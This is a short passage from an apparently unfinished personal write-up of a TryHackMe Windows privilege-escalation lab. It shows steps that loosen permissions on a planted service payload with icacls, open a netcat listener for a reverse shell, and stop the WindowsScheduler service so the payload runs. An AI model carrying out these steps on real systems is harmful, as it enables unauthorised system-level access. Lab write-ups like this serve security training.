JonmarCorpuz/Writeups/TryHackMe Module Task Writeups/(Unfinished) Windows Privilege Escalation.md

                3 Dir(s)  14,755,926,016 bytes free
 ```

+12. `icacls <PAYLOAD> /grant EVERYONE:F` from the compromised Windows machine to grant full control (read and write permissions) to the "Everyone" group for our payload
 ```PowerShell
 C:\PROGRA~2\SYSTEM~1>icacls WService.exe /grant Everyone:F
 processed file: WService.exe
 Successfully processed 1 files; Failed processing 0 files
 ```

+13. `nc -lvnp <PORT NUMBER>` from our attack machine to open up a netcat listener using the open port that we specified in our payload that'll listen for any inbound connection
 ```Bash
 root@ip-10-10-6-207:~# nc -lvnp 9999
 Listening on [0.0.0.0] (family 0, port 9999)
 ```

+14. `sc stop <SERVICE>` from the compromised Windows machine to stop our target service
 ```PowerShell
 C:\PROGRA~2\SYSTEM~1>sc stop WindowsScheduler